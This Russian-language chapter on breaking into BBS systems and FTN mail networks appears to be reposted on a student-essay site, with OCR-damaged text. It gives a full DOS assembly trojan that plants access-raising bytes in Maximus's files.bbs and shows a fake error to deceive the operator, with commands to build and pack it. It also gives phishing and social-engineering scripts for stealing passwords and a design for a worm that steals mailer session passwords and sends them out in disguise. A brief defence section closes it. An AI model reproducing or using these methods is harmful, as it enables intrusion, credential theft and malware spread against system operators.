BBS И FTN-СЕТИ 5 этой главе описаны методывзлома BBS и FTN-сетей, какпрограммные, так и обман-ные, Представлен исходныйтекст программы-взломщикас комментариями. Подробнорассказано о слабых мес-тах различных программ дляBBS и FTN-сетей. Даются ре-комендации по защите компь-ютера от несанкционирован-ного проникновения. BBS - Bulletin Board System электронная доска объявлений.
Это не-большой информационный центр на базе микрокомпьютера с винчес-тером большого объема, к которому пользователи могут подключитьсячерез свой компьютер по телефонной сети в режиме точка - точка. Работая с BBS, пользователи могут не только скопировать оттуда име-ющийся файл, но и оставить свой. Файлом может являться как письмо,так и обычная программа. Как правило, BBS работает в ночное время,а днем это обычный телефонный номер.
Главным на BBS является сис-темный оператор SysOp, который и назначает ее правила и тематику.Услуги BBS часто являются бесплатными, для связи с ней достаточнообычной терминальной программы. При первом входе нужно зарегист-рироваться, затем абоненту выделяется определенный промежуток вре-мени для работы. Часто выделяемого времени недостаточно, тогда появ-ляется потребность к взлому BBS. О том, как надо звонить на подобныеBBS, как получать оттуда файлы и писать письма, можно узнать
в спе-циальной литературе. Поставленная задача - рассказать читателю, ка-ким образом можно повысить себе уровень доступа или получить пол-ный доступ к компьютеру. Для системных операторов это будетлишним поводом задуматься о том, как страшны последствия безгра-мотности Взлом BBS Существует большое количество программ, предназначенных для созда-ния и поддержания работы BBS. Рассмотрим самую популярную срединих - Maximus.
Несанкционированно проникнуть на BBS, получить доступ к закрытымобластям, уничтожить информацию - такие задачи ставит перед собойвзломщик. Существуют так называемые списки файлов, в которых содержится ин-формация о доступных пользователям этой BBS ресурсах. Как правило,такие списки есть в каждой специальной тематической конференции.Пользователи могут скопировать оттуда какой-либо файл или оставитьсвой.
В программе Maximus списком всех файлов, доступных в конфе-ренции, является файл с названием files.bbs. Специально для этой программы создан язык программирования, схожийс языками С и Pascal. На нем можно писать собственные программы под BBS. Скорее всего, именно поэтому большинство системных опера-торов предпочитают использовать Maximus. После компиляции напи-санной программы ее можно добавить в общую базу
Maximus, и онаначнет работать. Каждая откомпилированная программа приобретает определенную мас-ку файла. Откомпилированная МЕС-программа имеет маску . bbs, схо-жую с маской списка файла. Обычно в этих файлах содержатся списки,но если в коде встречаются какие-либо служебные команды, они будутвыполнены. Этим взломщик и может воспользоваться. В Maximus существуют два языка МЕС и МЕХ. Язык МЕС оченьпрост, разобраться в нем может каждый.
Он позволяет оперировать раз-личными данными, заставками на BBS, базой пользователей. Систем-ный оператор обязательно должен знать этот язык. Используя команду PRIVUP языка МЕС системный оператор мо-жет без особых усилий повышать уровень пользователя, при условии,что последний будет писать и отправлять файлы на станцию. С повы-шением уровня, пользователь получает дополнительные возможностиувеличивается доступное для работы
время, объем информации, кото-рую можно получить с BBS. Этим и может воспользоваться хакер. Емуостается только найти BBS, работающую на программе Maximus, на ко-торой есть много файловых конференций. При этом одна из этих кон-ференций должна быть пустой то есть в ней не должно быть файлаfiles.bbs, содержащего доступные файлы в данной конференции. Такимобразом, остается проверить только одно условие
- если все копируе-мые на BBS файлы помещаются в конференцию, которая была выбранапоследний раз, то такую BBS можно взломать без особых усилий. Хаке-ру остается только создать файл files.тес, записать в него командуPRIVUP, затем откомпилировать этот файл при помощи компилятораМЕССА теперь он будет называться files.bbs и отправить его на BBS.С этого момента хакер может поднимать свой уровень доступа, просмат-ривая данную конференцию, пока он не достигнет уровня системногооператора станции.
После этого компьютер окажется полностью в егораспоряжении. Если под рукой не оказалось компилятора МЕССА, то создать files.bbsможно и вручную. Для этого нужно создать файл files.bbs, а затем ввес-ти в него команду повышения уровня - на языке Maximus это всего трисимвола код первого - 23h, следующие два - символы pU. Еще один способ взлома BBS рассчитан на неграмотных системных опе-раторов, не обладающих глубокими
знаниями. Он заключается в том,что на станцию засылается программа причем безразлично, куда онапопадет, которая сама добавит команду повышения уровня в файлfiles.bbs. Во время просмотра доступных файлов хакеру автоматическибудет подниматься уровень. Ниже приведен текст похожей исходнойпрограммы - фантазия тут может быть безгранична. Эта программа до-бавляет в файл files.bbs байты, повышающие уровень пользователю.
После того, как системный оператор запустит эту программу на своемкомпьютере, программа ищет файл files.bbs и дописывает туда три бай-та. Приведенный пример рассчитан на системных операторов, которыедержат свои файлы в каталоге, по умолчанию предлагаемом программойдля установки. Хотя можно добавить поиск files.bbs по всему винчесте-ру компьютера. assume cscseg, dscsegcseg segmentorg 100hstart .Найдем файл FILES.BBSmov ah,4Ehmov dx.offset fnamemov cx,20hint 21 h
Если файл отсутствует, то выйдем из программы -здесь нечего исправлятьjc exit 0ткроем найденный файлmov ax,3D02hmov dx,9Ehint 21 hjc exit Установим указатель чтениязаписи в конец файлаmov bx.axmov ax,4202hхог сх.схxor dx,dxint 21h Записываем в файл три байтаmov ah,40hmov cx,3 mov dx.offset bytesint 21 hjc exit 3акроем файлmov ah,3Ehint 21 h Выдадим сообщение об ошибке и выйдем в DOS. Дело в том,что отработавшая программа не должна вызвать подозренийсистемного оператора.
Цель - заставить системного оператора думать, что файл испорчен. Возможно, он допустит, что иногдапри передаче файлов происходят ошибки, и поэтому файлмог стать неработоспособнымexit Выдадим сообщение об ошибкеmov ah,09h mov dx, offset messageint 21 h Выход в DOSmov ah,4Chint 21 h Mycop - специально для того, чтобы упаковатьфайл утилитой PKLITEGarbage db 12000 dup A Имя файла FILES.BBSfname db files.bbs,0
Сообщение об ошибкеmessage db CRC file error, 13,10, .Записываемые байтыbytes db 23h,pUcseg endsend start После того, как файл откомпилирован, его нужно упаковывать, чтобысистемный оператор ничего не заподозрил. Этот файл будет содержатьбольшое количество непонятных символов, и при быстром просмотрераспознать скрытую в нем программу практически невозможно. tasm.exe vzlom.asmtlink.exe vzlom.obj tpklite vzlom.
com После этого файл отправляется на BBS и комментируется как демонст-рационная программа или как утилита для DOS. Дальше взломщикуостается только ждать, пока системный оператор запустит файл. Черезнекоторое время можно звонить и наслаждаться. Данный метод не сра-ботает, если настоящая опция File Titles в Maximus заменена на ей по-добную. Получение пароля
BBS без взлома Рассмотренные выше способы взлома BBS предполагают наличиеу пользователя базовых знаний о системе. Теперь немного о том, какможно достать пароль еще проще. Практически на каждой BBS суще-ствуют неопытные пользователи, имеющие высокий уровень доступаинформация об уровне доступа пользователей BBS доступна почтивсегда. Если же такого пункта нет, то хорошего пользователя всегдаможно вычислить, например, по времени, которое
он проводит на стан-ции, или по объему скопированной и присланной им информации.Итак, определив человека, паролем которого неплохо завладеть, пишемему письмо о том, что по техническим причинам причину придумыва-ем любую, главное правдоподобную ему следует изменить свой рабо-чий пароль предлагаем новый, например НАСК01. После того, какпользователь поменяет свой пароль на это ему нужно отвести дня два-три, поскольку в один день он может не позвонить, в другой - толькопоменяет пароль,
в общем, время ему понадобиться, можно беспрепят-ственно входить под его именем и пользоваться системой. Главное, что-бы письмо было написано от имени системного оператора или какого-либо администратора данной системы. Если система не позволяетменять имя адресата в поле FROM, стоит зайти в нее под другим име-нем к примеру, Mr. CoSysOp и написать подобное письмо. Наверное,не надо предупреждать, что все данные, указанные при
регистрации подзаведомо ложным именем, не должны быть настоящими. Можно предложить еще один способ проникновения - метод забыва-ния пароля. Вся хитрость в том, что при входе в систему указываетсяимя какого-либо пользователя этой BBS, пароль которого, естественно,не известен. После неудачных попыток ввода пароля не надо пытатьсяего подобрать, лучше сделать вид, что пароль забыт, вводя различныеслова, типа
Sprite, Cola и так далее нужно составить письмо системно-му оператору с просьбой поменять забытый пароль на другой. Указы-ваем новый пароль, затем сочиняем душещипательную историю о ка-ком-нибудь хакере, якобы подобравшем наш пароль на другой BBS иливообще в Интернет, из-за чего приходится использовать на всех систе-мах разные пароли. Если системный оператор не очень опытный, выс-лушав такую ужасную историю он обязательно войдет в положение не-счастного и выполнит его просьбу - поменяет текущий пароль напредложенный.
Дальше - полная свобода действий. Работоспособностьданного метода зависит от того, насколько опытен оператор, а такжеубедительна ли выдуманная история. Прочитав ее, системный операторне должен и предположить, что его обманывают. Взлом FTN-сетей Что можно сказать о широко используемой технологии FTN Множе-ство лазеек для взлома. Чего стоит почтовый файл
РКТ, содержащийв себе незашифрованный пароль, узнать который никаких проблем несоставляет А файлы с паролями в уважаемом всеми T-Mail, хранящие-ся в нешифрованном виде и доступные любому грамотному человеку,впрочем, как и все конфигурационные файлы наиболее распространен-ных программ для работы с FTN На основе подобных промахов в раз-работке уже давно написаны программы, позволяющие сломать ту илииную BBS, вызвать режим DoorWay и сотворить с удаленным серверомвсе, что угодно.
Однако это еще не предел возможностей программиста.Подумаешь, сломать BBS Власть над одной из BBS - ничто в сравне-нии с тем, что хакер может держать в своей руке почту от сотен почто-вых узлов, отправлять почту от чужого имени, действовать от лица дру-гого члена или пользователя FTN. Фантастика Нет - реальность. Почитатели Эдгара По наверняка знают выражение Червь-
Победи-тель. Собственно, любой грамотно написанный червь станет победи-телем, если выйдет на свободу. Особенно с применением свежих идей.Применяя технологию СМ саморазмножающиеся механизмы, называ-емую в народе компьютерные вирусы, можно добиться немалого. Включив в свой СМ некоторую особенность, вместо привычной дест-рукции можно получить парольный доступ ко многим почтовым узламсо всеми вытекающими отсюда последствиями.
Как известно, при ус-тановке соединения между двумя FTN-мейлерами они сравниваютсвои адреса и пароли. То есть сначала хост получает основной адресзвонящего мейлера и пароль на сессию. Если в конфигурации хостауказаны адрес и пароль звонящего и они совпадают с предъявленнымпаролем, хост показывает звонящему свой пароль и при совпадениитаковых происходит парольная сессия. В подавляющем большинствеслучаев электронная почта передается только в парольные сессии,иначе
любой мейлер мог бы предъявить хосту подставной адрес и заб-рать почту, предназначенную для других. В данном случае для того,чтобы перехватывать чужую электронную почту или действовать отлица какого-либо системного оператора, необходимо узнать пароли насессию звонящей системы и хоста, ожидающего звонка. Кто-то ирони-чески улыбнется Как же их можно узнать, если нет возможностиприкинуться хостом, чтобы звонящая система показала свои пароли,если она звонит совсем по другому номеру телефона.
Разумеется.Но это не нужно. Кто-то скажет В таком случае получить эти паро-ли и от хоста нельзя, поскольку он не будет предъявлять свой парольи не включит парольную сессию, пока не увидит, что предложенныйпароль совпадает с его паролем Конечно. Но это тоже не нужно.Что же предпринять Дело в том, что и хост, и звонящая система мо-гут преподнести свои пароли на блюдечке. Для этого не нужно за-хватывать в заложники семью системного оператора или предлагатьмиллионы долларов
хозяину системы - достаточно разместить на ком-пьютере системного оператора незаметную программу, которая эти па-роли найдет и отправит на какой-либо из указанных FTN-адресов.Вот и все. Больше ничего не нужно. Теперь несколько возможностей реализации этого плана. В странахбывшего СССР наиболее часто используется DOS-совместимый мей-лер Андрея Елкина T-Mail, поэтому принципы взлома рассмотрены напримере системы,
работающей именно на его основе. Некоторыепользуются программой Антона Дейнова SantaFox-Mail, принципыее взлома похожи, кроме того, взломать эту систему гораздо легче бла-годаря встроенной функции DoorWay. Но об этом ниже. Итак, что жепрограмма должна сделать с системой, чтобы заветные пароли нако-нец-то были получены Собственно, алгоритм весьма прост, и описатьего можно примерно так 1.
Определение расположения программы T-Mail на жестком дискесистемы. 2. Определение расположения конфигурационных файлов системы. 3. Извлечение списка паролей и адресов из конфигурации системы. 4. Шифрование списка паролей и адресов с эмуляцией PGP-кодирования. 5. Отправление зашифрованного списка паролей и адресов через ап-линка по роутингу на
систему взломщика. Теперь рассмотрим возможные способы реализации. Теоретически этоне сложно. Как правило, системные операторы держат свой T-Mail на жестком дис-ке. Первая задача - определить, куда же оператор спрятал свое сокро-вище. Тут-то и намечается разделение. Можно написать троянца,подсадить его в какую-либо конкретную систему и ждать, когда этасистема пришлет свои пароли по почте.
Но можно написать и вирус,расходящийся на несколько почтовых узлов, после чего все зараженныеузлы сообщат пароли на сессии со всеми своими парольными линками.Можно искать T-Mail по всему жесткому диску с помощью рекурсивно-го обхода всех логических дисков и вложенных каталогов. Понятно, чтоэтот метод не так уж деликатен, поскольку системный оператор можетзаметить, что некая программа на протяжении нескольких минут поче-му-то занимает винчестер.
От такой глупости откажемся. Другое дело,если этим будет заниматься вирус. Почему Да потому, что большин-ство вирусов отслеживают вызовы функции 4Bh DOS-прерывания 21hдля заражения программ. В таком случае, что мешает этому вирусу ана-лизировать запущенные программы на предмет а не T-Mail ли это ча-сом и находить сокровища именно таким образом Ничего. Анализправильнее будет вести не только по имени запускаемого файла, пото-му что системный оператор
мог переименовать программу, а в данномслучае необходима максимальная надежность. Поэтому лучше всего от-лавливать T-Mail по постоянной сигнатуре ЕХЕ-файла. Узнав, где находится программа T-Mail, можно определить, где находят-ся ее конфигурационные файлы. Если при запуске T-Mail ключ -С незадан кстати, перехват командной строки - это еще один доводв пользу того, что поиск программы корректнее выполнять при помощивируса, основным файлом конфигурации
является T-MAIL.CTL, на-ходящийся в том же каталоге, что и T-Mail. При запуске программыключ -С задает путь и имя основного конфигурационного файла, ко-торый понадобится для взлома. Так что необходимо предусмотреть обаварианта запуска. После определения места расположения основного конфигурационного файла нужно получить путь еще к двум файлам -файлу паролей и файлу подстановок пароли могут находиться в обоихфайлах.
Важное замечание если пароль для какого-либо адреса указанв файле подстановок, его дублер из файла паролей игнорируется. Путь к файлу паролей указан в переменной Security, к файлу подстано-вок - в переменной SubstList. Переменная конфигурационного файла -это строка, начинающаяся со специальных слов. Например, строка Security CNETWORKT-MAILPASSWORDS.
LST называется переменной Security и содержит путь и имя файла паролей,в то время как строка SubstList CNETWORKT-MAILSUBST.LST называется, соответственно, переменной SubstList и содержит путьи имя файла подстановок. Разумеется, было бы нежелательно отправ-лять эти два файла вложением attach, поскольку оно может поте-ряться. Надежнее передать эти текстовые файлы по электронной почтев виде обычного письма.
Тут возникает проблема если системныйоператор станции, через которую будет проходить это послание ведьвсем известно о его праве читать транзитную почту, обнаружит паро-ли, он немедленно предупредит об этом того оператора, у кого эти па-роли были украдены. Последний договорится со всеми линками о но-вых паролях, и все старания окажутся напрасными. То есть в целяхконспирации придется зашифровать письмо, чтобы при его просмотреказалось, что оно содержит прикрепленный файл.
Разумеется, этоне обязательно должен быть настоящий PGP, достаточно лишь внеш-него сходства и невозможности быстро расшифровать засекреченноепослание. Это неплохая гимнастика для ума, поскольку хакер долженуметь не только расшифровывать, но и маскироваться, не только ло-мать, но и строить. Теперь нужно выбрать адрес, на который придет это письмо. Желатель-но отправить его по e-mail в Internet через
FTN-Internet гейт. Делов том, что в таком случае пострадавшему системному оператору будеточень сложно найти отправителя. Очевидно, в этом письме полеFrom и обратный адрес должны быть подставными. Это собьет сис-темного оператора с толку, и он не станет удалять или задерживатьписьмо, особенно если в него добавлены лишние клуджи cVia.О том, как создать нетмейл письмо, можно прочитать в FTS. Почему же SantaFox-Mail сломать гораздо проще
Дело в том, чтов основном конфигурационном файле SF-Mail имеется переменная, ука-зывающая пароль на режим DoorWay. От червя требуется только за-дать какой-либо заранее известный пароль на пользование DoorWay,после чего нужно соединиться терминальной программой с этой систе-мой и набирать это слово. Попав в DoorWay, файлы паролей и подста-новок можно украсть голыми руками.
Конечно, если системный опе-ратор заметит, что кто-то брал у него эти файлы, он приметсоответствующие меры. Кроме того, после изменения паролей могутпоявиться сбои в работе системы - пользователи будут пытаться войтив DoorWay со старыми паролями, но они не будут работать. Ясно, чтооператор об этом узнает очень скоро. Как было показано в предыдущей части, червь может не только воро-вать пароли, но и задавать свои. В T-Mail нет режима
DoorWay, затоесть так называемый главный пароль системы, заданный в перемен-ной T-Password основного конфигурационного файла. Изменив этотпароль, можно послать на удаленную систему письмо с соответствую-щими указаниями к действиям и добиться нужного результата. Об указаниях подробно написано в документации по программе T-Mail,но нужно помнить, что системный оператор будет оповещен обо всехнесоответствиях и сбоях в работе
системы. Безопасность вашей BBS Если у вас дома стоит собственная BBS или вы только собираетесьее открыть, сначала нужно позаботиться о ее безопасности. Во-первых, прежде чем создать свою BBS, надо выбрать программу длянее. Чем больше возможностей предоставляет программа, тем большевсевозможных лазеек, которыми может воспользоваться хакер. В Maxi-mus эти лазейки уже описаны - лучше всего не пользоваться этой про-граммой.
Если Maximus все-таки используется, лучше не устанавливатьШ больше никаких дополнительных утилит, поскольку именно они могут I, послужить предпосылкой проникновения хакера на BBS. DOS-SHELL1В1 луиис сразу убрать с BBS. Никогда никому нельзя раскрывать свои па-1В 1али копировать информацию о пользователях также не стоит. Береги-В Т5 троянских программ, копируемых пользователями. Их можно про-н верять либо отладчиками, либо дизассемблером,
другого способа нет,В разве что не запускать их совсем. Особое внимание нужно уделить директориям. Никогда не устанавли-вайте программный продукт в директорию, предлагаемую программойпо умолчанию. Это, несомненно, может облегчить работу любой троян-ской программе. Также не стоит запускать маленькие файлы, попавшиена станцию извне. Обычно такие программы и являются бомбами оп-ределенного действия.
Вообще лучшая защита - это нападение. Дело в том, что хакерами мно-гие называют себя совершенно безосновательно. Хакер по заказу фир-мы-производителя ломает их системы, таким образом находя лазейки,которые могут быть использованы подобными взломщиками. То естьхакер ищет дыры, а компания их закрывает. Таким образом, суще-ствуют системы, которые взломать практически невозможно.
! |
Как писать рефераты Практические рекомендации по написанию студенческих рефератов. |
! | План реферата Краткий список разделов, отражающий структура и порядок работы над будующим рефератом. |
! | Введение реферата Вводная часть работы, в которой отражается цель и обозначается список задач. |
! | Заключение реферата В заключении подводятся итоги, описывается была ли достигнута поставленная цель, каковы результаты. |
! | Оформление рефератов Методические рекомендации по грамотному оформлению работы по ГОСТ. |
→ | Виды рефератов Какими бывают рефераты по своему назначению и структуре. |